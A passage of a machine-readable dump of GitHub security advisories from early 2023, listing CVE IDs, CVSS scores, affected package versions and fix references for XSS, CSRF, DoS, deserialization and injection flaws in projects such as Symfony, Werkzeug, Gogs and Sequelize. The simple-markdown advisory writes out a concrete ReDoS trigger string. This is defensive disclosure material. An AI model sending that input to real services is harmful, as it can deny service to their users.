improper neutralization of input during web page generation ('Cross-site Scripting') [CWE-79] vulnerability in Sling App CMS version 1.1.4 and prior may allow an authenticated remote attacker to perform a reflected cross-site scripting (XSS) attack in multiple features. Upgrade to Apache Sling App CMS >= 1.1.6,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.sling:org.apache.sling.cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.6'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22849'}, {'type': 'WEB', 'url': 'https://sling.apache.org/news.html'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T21:31:51Z', 'nvd_published_at': '2023-02-04T21:15:00Z'}" 1.4.0,GHSA-q9ww-gjpw-p9g6,2023-02-24T18:58:07Z,2023-02-16T12:30:22Z,,['CVE-2023-0860'],Improper Restriction of Excessive Authentication Attempts in modoboa,Improper Restriction of Excessive Authentication Attempts in GitHub repository modoboa/modoboa-installer prior to 2.0.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'modoboa'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0860'}, {'type': 'WEB', 'url': 'https://github.com/modoboa/modoboa-installer/commit/63d92b73f3da6971ae4e13d033d625773ac91085'}, {'type': 'PACKAGE', 'url': 'https://github.com/modoboa/modoboa'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/64f3ab93-1357-4468-8ff4-52bbcec18cca'}]","{'cwe_ids': ['CWE-307'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T18:45:14Z', 'nvd_published_at': '2023-02-16T10:15:00Z'}" 1.4.0,GHSA-j2h2-g882-x9j2,2023-02-16T23:33:54Z,2023-02-08T21:30:18Z,,['CVE-2022-45982'],Deserialization of Untrusted Data in thinkphp,thinkphp 6.0.0~6.0.13 and 6.1.0~6.1.1 contains a deserialization vulnerability. This vulnerability allows attackers to execute arbitrary code via a crafted payload.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'topthink/think'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '6.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-45982'}, {'type': 'WEB', 'url': 'https://gist.github.com/Dar1in9s/aa87df679057db3bbdade360d77f8cca'}, {'type': 'PACKAGE', 'url': 'https://github.com/top-think/think'}]","{'cwe_ids': ['CWE-502'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-16T23:33:54Z', 'nvd_published_at': '2023-02-08T21:15:00Z'}" 1.4.0,GHSA-h7vf-5wrv-9fhv,2023-02-14T19:25:20Z,2023-02-01T18:48:09Z,,['CVE-2022-24894'],Symfony storing cookie headers in HttpCache,"Description ----------- The Symfony HTTP cache system acts as a reverse proxy: it caches HTTP responses (including headers) and returns them to clients. In a recent `AbstractSessionListener` change, the response might now contain a `Set-Cookie` header. If the Symfony HTTP cache system is enabled, this header might be stored and returned to some other clients. An attacker can use this vulnerability to retrieve the victim's session. Resolution ---------- The `HttpStore` constructor now takes a parameter containing a list of private headers that are removed from the HTTP response headers. The default value for this parameter is `Set-Cookie`, but it can be overridden or extended by the application. The patch for this issue is available [here](https://github.com/symfony/symfony/commit/d2f6322af9444ac5cd1ef3ac6f280dbef7f9d1fb) for branch 4.4. Credits ------- We would like to thank Soner Sayakci for reporting the issue and Nicolas Grekas for fixing it. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:L/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '4.4.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.4.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/http-kernel'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.0.0'}, {'fixed': '4.4.50'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.4.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.0.20'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.1.0'}, {'fixed': '6.1.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'symfony/symfony'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.2.0'}, {'fixed': '6.2.6'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/symfony/symfony/security/advisories/GHSA-h7vf-5wrv-9fhv'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-24894'}, {'type': 'WEB', 'url': 'https://github.com/symfony/symfony/commit/d2f6322af9444ac5cd1ef3ac6f280dbef7f9d1fb'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/http-kernel/CVE-2022-24894.yaml'}, {'type': 'WEB', 'url': 'https://github.com/FriendsOfPHP/security-advisories/blob/master/symfony/symfony/CVE-2022-24894.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/symfony/symfony'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2023/07/msg00014.html'}, {'type': 'WEB', 'url': 'https://symfony.com/cve-2022-24894'}]","{'cwe_ids': ['CWE-285'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-01T18:48:09Z', 'nvd_published_at': '2023-02-03T22:15:00Z'}" 1.4.0,GHSA-rr93-7c6x-8v4v,2023-02-24T16:03:58Z,2023-02-15T15:30:40Z,,['CVE-2023-25767'],Cross-Site Request Forgery in Jenkins Azure Credentials Plugin,A cross-site request forgery (CSRF) vulnerability in Jenkins Azure Credentials Plugin 253.v887e0f9e898b and earlier allows attackers to connect to an attacker-specified web server.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:azure-credentials'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '253.v887e0f9e898b'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25767'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/azure-credentials-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-1756'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-352'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:33:24Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-p24m-863f-fm6q,2023-02-15T17:42:42Z,2023-02-15T17:42:42Z,,['CVE-2023-25578'],Denial of service vulnerability when parsing multipart request body,"### Summary The request body parsing in `starlite` allows a potentially unauthenticated attacker to consume a large amount of CPU time and RAM. ### Details The multipart body parser processes an unlimited number of file parts. The multipart body parser processes an unlimited number of field parts. ### Impact This is a remote, potentially unauthenticated Denial of Service vulnerability. This vulnerability affects applications with a request handler that accepts a `Body(media_type=RequestEncodingType.MULTI_PART)`. The large amount of CPU time required for processing requests can block all available worker processes and significantly delay or slow down the processing of legitimate user requests. The large amount of RAM accumulated while processing requests can lead to Out-Of-Memory kills. Complete DoS is achievable by sending many concurrent multipart requests in a loop. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'starlite'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.51.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/starlite-api/starlite/security/advisories/GHSA-p24m-863f-fm6q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25578'}, {'type': 'WEB', 'url': 'https://github.com/starlite-api/starlite/commit/9674fe803628f986c03fe60769048cbc55b5bf83'}, {'type': 'PACKAGE', 'url': 'https://github.com/starlite-api/starlite'}, {'type': 'WEB', 'url': 'https://github.com/starlite-api/starlite/releases/tag/v1.51.2'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T17:42:42Z', 'nvd_published_at': '2023-02-15T15:15:00Z'}" 1.4.0,GHSA-74m5-2c7w-9w3x,2023-02-14T21:31:28Z,2023-02-14T21:31:28Z,,[],MultipartParser denial of service with too many fields or files,"### Impact The `MultipartParser` using the package `python-multipart` accepts an unlimited number of multipart parts (form fields or files). Processing too many parts results in high CPU usage and high memory usage, eventually leading to an OOM process kill. This can be triggered by sending too many small form fields with no content, or too many empty files. For this to take effect application code has to: * Have `python-multipart` installed and * call `request.form()` * or via another framework like FastAPI, using form field parameters or `UploadFile` parameters, which in turn calls `request.form()`. ### Patches The vulnerability is solved in Starlette 0.25.0 by making the maximum fields and files customizable and with a sensible default (1000). Applications will be secure by just upgrading their Starlette version to 0.25.0 (or FastAPI to 0.92.0). If application code needs to customize the new max field and file number, there are new `request.form()` parameters (with the default values): * `max_files=1000` * `max_fields=1000` ### Workarounds Applications that don't install `python-multipart` or that don't use form fields are safe. In older versions, it's also possible to instead of calling `request.form()` call `request.stream()` and parse the form data in internal code. In most cases, the best solution is to upgrade the Starlette version. ### References This was reported in private by @das7pad via internal email. He also coordinated the fix across multiple frameworks and parsers. The details about how `multipart/form-data` is structured and parsed are in the [RFC 7578](https://www.rfc-editor.org/rfc/rfc7578). ",[],"[{'package': {'ecosystem': 'PyPI', 'name': 'starlette'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.25.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/encode/starlette/security/advisories/GHSA-74m5-2c7w-9w3x'}, {'type': 'PACKAGE', 'url': 'https://github.com/encode/starlette'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T21:31:28Z', 'nvd_published_at': None}" 1.4.0,GHSA-j533-2g8v-pmpg,2023-02-22T16:31:59Z,2023-02-12T15:30:25Z,,['CVE-2019-25102'],Regular Expression Denial of Service in simple-markdown,"A vulnerability, which was classified as problematic, was found in simple-markdown 0.6.0. Affected is an unknown function of the file simple-markdown.js. The manipulation with the input <<<<<<<<<<:/:/:/:/:/:/:/:/:/:/ leads to inefficient regular expression complexity. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 0.6.1 is able to address this issue. The name of the patch is 015a719bf5cdc561feea05500ecb3274ef609cd2. It is recommended to upgrade the affected component. VDB-220638 is the identifier assigned to this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'simple-markdown'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-25102'}, {'type': 'WEB', 'url': 'https://github.com/ariabuckles/simple-markdown/pull/73'}, {'type': 'WEB', 'url': 'https://github.com/ariabuckles/simple-markdown/commit/015a719bf5cdc561feea05500ecb3274ef609cd2'}, {'type': 'PACKAGE', 'url': 'https://github.com/ariabuckles/simple-markdown'}, {'type': 'WEB', 'url': 'https://github.com/ariabuckles/simple-markdown/releases/tag/0.6.1'}, {'type': 'WEB', 'url': 'https://vuldb.com/?ctiid.220638'}, {'type': 'WEB', 'url': 'https://vuldb.com/?id.220638'}]","{'cwe_ids': ['CWE-1333'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:57:45Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-fxrq-xhj9-rf5j,2023-02-24T16:01:31Z,2023-02-12T15:30:24Z,,['CVE-2023-0793'],Weak Password Requirements in thorsten/phpmyfaq,Weak Password Requirements in GitHub repository thorsten/phpmyfaq prior to 3.1.11.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'thorsten/phpmyfaq'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.1.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0793'}, {'type': 'WEB', 'url': 'https://github.com/thorsten/phpmyfaq/commit/00c04093c671607ee06cdfd670070809460f9547'}, {'type': 'PACKAGE', 'url': 'https://github.com/thorsten/phpMyFAQ'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/b3881a1f-2f1e-45cb-86f3-735f66e660e9'}]","{'cwe_ids': ['CWE-521'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-14T00:43:59Z', 'nvd_published_at': '2023-02-12T14:15:00Z'}" 1.4.0,GHSA-pfvh-p8qp-9ww9,2023-03-09T15:31:59Z,2023-02-28T20:12:11Z,,['CVE-2022-2024'],Gogs OS Command Injection vulnerability,"### Impact The malicious user is able to update a crafted `config` file into repository's `.git` directory in combination with crafted file deletion to gain SSH access to the server on case-insensitive file systems. All installations with [repository upload enabled (default)](https://github.com/gogs/gogs/blob/f36eeedbf89328ee70cc3a2e239f6314f9021f58/conf/app.ini#L127-L129) on case-insensitive file systems (Windows, macOS, etc.) are affected. ### Patches Make sanitization of upload path to `.git` directory to be case-insensitive. Users should upgrade to 0.12.11 or the latest 0.13.0+dev. ### Workarounds Disable [repository upload](https://github.com/gogs/gogs/blob/f36eeedbf89328ee70cc3a2e239f6314f9021f58/conf/app.ini#L127-L129). ### References https://huntr.dev/bounties/18cf9256-23ab-4098-a769-85f8da130f97/ ### For more information If you have any questions or comments about this advisory, please post on https://github.com/gogs/gogs/issues/7030. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'gogs.io/gogs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.12.11'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/gogs/gogs/security/advisories/GHSA-pfvh-p8qp-9ww9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2022-2024'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/issues/7030'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/commit/15d0d6a94be0098a8227b6b95bdf2daed105ec41'}, {'type': 'PACKAGE', 'url': 'https://github.com/gogs/gogs'}, {'type': 'WEB', 'url': 'https://github.com/gogs/gogs/blob/f36eeedbf89328ee70cc3a2e239f6314f9021f58/conf/app.ini#L127-L129'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/18cf9256-23ab-4098-a769-85f8da130f97'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-28T20:12:11Z', 'nvd_published_at': '2023-02-25T08:15:00Z'}" 1.4.0,GHSA-f598-mfpv-gmfx,2023-02-24T18:48:49Z,2023-02-24T18:48:49Z,,['CVE-2023-22578'],Sequelize - Default support for “raw attributes” when using parentheses,"### Impact Sequelize 6.28.2 and prior has a dangerous feature where using parentheses in the attribute option would make Sequelize use the string as-is in the SQL ```ts User.findAll({ attributes: [ ['count(id)', 'count'] ] }); ``` Produced ```sql SELECT count(id) AS ""count"" FROM ""users"" ``` ### Patches This feature was deprecated in Sequelize 5, and using it prints a deprecation warning. This issue has been patched in [`@sequelize/core@7.0.0.alpha-20`](https://github.com/sequelize/sequelize/pull/15374) and [`sequelize@6.29.0`](https://github.com/sequelize/sequelize/pull/15710). In Sequelize 7, it now produces the following: ```sql SELECT ""count(id)"" AS ""count"" FROM ""users"" ``` In Sequelize 6, it throws an error explaining that we had to introduce a breaking change, and requires the user to explicitly opt-in to either the Sequelize 7 behavior (always escape) or the Sequelize 5 behavior (inline attributes that include `()` without escaping). See https://github.com/sequelize/sequelize/pull/15710 for more information. ### Mitigations Do not use user-provided content to build your list or attributes. If you do, make sure that attribute in question actually exists on your model by checking that it exists in the `rawAttributes` property of your model first. --- A discussion thread about this issue is open at https://github.com/sequelize/sequelize/discussions/15694 CVE: CVE-2023-22578","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': '@sequelize/core'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.0.0-alpha.20'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'sequelize'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.29.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/security/advisories/GHSA-f598-mfpv-gmfx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-22578'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/pull/15710'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/CVE-2023-22578'}, {'type': 'WEB', 'url': 'https://csirt.divd.nl/DIVD-2022-00020/'}, {'type': 'PACKAGE', 'url': 'https://github.com/sequelize/sequelize'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/discussions/15694'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v6.29.0'}, {'type': 'WEB', 'url': 'https://github.com/sequelize/sequelize/releases/tag/v7.0.0-alpha.20'}]","{'cwe_ids': ['CWE-790'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-24T18:48:49Z', 'nvd_published_at': None}" 1.4.0,GHSA-5vx9-j5cw-47vq,2023-03-01T01:35:47Z,2023-02-17T18:30:24Z,,['CVE-2021-32163'],Privilege escalation in MOSN,Authentication vulnerability in MOSN before v.0.23.0 allows attacker to escalate privileges via case-sensitive JWT authorization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'mosn.io/mosn'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.23.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32163'}, {'type': 'WEB', 'url': 'https://github.com/mosn/mosn/issues/1633'}, {'type': 'WEB', 'url': 'https://github.com/mosn/mosn/pull/1637'}, {'type': 'PACKAGE', 'url': 'https://github.com/mosn/mosn'}]","{'cwe_ids': ['CWE-178', 'CWE-863'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-02-17T20:47:37Z', 'nvd_published_at': '2023-02-17T18:15:00Z'}" 1.4.0,GHSA-2qxp-xmx6-cq4f,2023-02-15T22:00:35Z,2023-02-08T00:30:34Z,,['CVE-2023-0735'],Cross-Site Request Forgery (CSRF) in wallabag/wallabag,Cross-Site Request Forgery (CSRF) in GitHub repository wallabag/wallabag prior to 2.5.4.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wallabag/wallabag'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-0735'}, {'type': 'WEB', 'url': 'https://github.com/wallabag/wallabag/commit/268372dbbdd7ef87b84617fdebf95d0a86caf7dc'}, {'type': 'PACKAGE', 'url': 'https://github.com/wallabag/wallabag'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/8bc78cb1-b10b-4152-842e-ceb999fc5508'}]","{'cwe_ids': ['CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-08T18:13:53Z', 'nvd_published_at': '2023-02-07T23:15:00Z'}" 1.4.0,GHSA-97qf-pq7x-964m,2023-03-02T18:16:35Z,2023-02-17T21:30:41Z,,['CVE-2023-23921'],Moodle Cross-site Scripting vulnerability,The vulnerability was found Moodle which exists due to insufficient sanitization of user-supplied data in some returnurl parameters. A remote attacker can trick the victim to follow a specially crafted link and execute arbitrary HTML and script code in user's browser in context of vulnerable website. This flaw allows a remote attacker to perform cross-site scripting (XSS) attacks.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.9.19'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.10.0'}, {'fixed': '3.11.12'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0-beta'}, {'fixed': '4.0.6'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'moodle/moodle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.1.0-beta'}, {'fixed': '4.1.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-23921'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=2162526'}, {'type': 'PACKAGE', 'url': 'https://github.com/moodle/moodle'}, {'type': 'WEB', 'url': 'https://moodle.org/mod/forum/discuss.php?d=443272#p1782021'}, {'type': 'WEB', 'url': 'http://git.moodle.org/gw?p=moodle.git&a=search&h=HEAD&st=commit&s=MDL-76810'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-03-02T18:16:35Z', 'nvd_published_at': '2023-02-17T20:15:00Z'}" 1.4.0,GHSA-xg9f-g7g7-2323,2023-02-15T15:36:26Z,2023-02-15T15:36:26Z,,['CVE-2023-25577'],High resource usage when parsing multipart form data with many fields,"Werkzeug's multipart form data parser will parse an unlimited number of parts, including file parts. Parts can be a small amount of bytes, but each requires CPU time to parse and may use more memory as Python data. If a request can be made to an endpoint that accesses `request.data`, `request.form`, `request.files`, or `request.get_data(parse_form_data=False)`, it can cause unexpectedly high resource usage. This allows an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests. The amount of RAM required can trigger an out of memory kill of the process. Unlimited file parts can use up memory and file handles. If many concurrent requests are sent continuously, this can exhaust or kill all available workers.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'Werkzeug'}, 'ecosystem_specific': {'affected_functions': ['werkzeug.Request.from_values']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/security/advisories/GHSA-xg9f-g7g7-2323'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25577'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/commit/517cac5a804e8c4dc4ed038bb20dacd038e7a9f1'}, {'type': 'PACKAGE', 'url': 'https://github.com/pallets/werkzeug'}, {'type': 'WEB', 'url': 'https://github.com/pallets/werkzeug/releases/tag/2.2.3'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20230818-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2023/dsa-5470'}]","{'cwe_ids': ['CWE-400', 'CWE-770'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T15:36:26Z', 'nvd_published_at': '2023-02-14T20:15:00Z'}" 1.4.0,GHSA-9j65-3f2q-8q2r,2023-02-23T21:31:36Z,2023-02-15T15:30:41Z,,['CVE-2023-25762'],Cross-site Scripting in Jenkins Pipeline: Build Step Plugin,"Jenkins Pipeline: Build Step Plugin 2.18 and earlier does not escape job names in a JavaScript expression used in the Pipeline Snippet Generator, resulting in a stored cross-site scripting (XSS) vulnerability exploitable by attackers able to control job names.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jenkins-ci.plugins:pipeline-build-step'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.18'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-25762'}, {'type': 'PACKAGE', 'url': 'https://github.com/jenkinsci/pipeline-build-step-plugin'}, {'type': 'WEB', 'url': 'https://www.jenkins.io/security/advisory/2023-02-15/#SECURITY-3019'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2023/02/15/4'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-02-15T18:25:13Z', 'nvd_published_at': '2023-02-15T14:15:00Z'}" 1.4.0,GHSA-8cfg-vx93-jvxw,2023-09-18T21:20:19Z,2023-02-06T23:27:56Z,,['CVE-2020-8565'],Kubernetes client-go vulnerable to Sensitive Information Leak via Log File,"In Kubernetes, if the logging level is set to at least 9, authorization and bearer tokens will be written to log files. This can occur both in API server logs and client tool output like kubectl. This affects <= v1.19.5, <= v1.18.13, <= v1.17.15, < v1.20.0-alpha2.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'k8s.io/client-go'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.19.0'}, {'fixed': '0.19.6'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/client-go'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.20.0-alpha.0'}, {'fixed': '0.20.0-alpha.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/client-go'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.18.0'}, {'fixed': '0.18.14'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'k8s.io/client-go'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.17.16'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8565'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/issues/95623'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/kubernetes/pull/95316'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/client-go/commit/19875a3d5a2e0d4f51c976a9e0662de3c2c011e3'}, {'type': 'WEB', 'url': 'https://github.com/kubernetes/client-go/commit/1b8383fc150c9b816b0072032cca75754c2734d0'}, {'type': 'WEB', 'url': 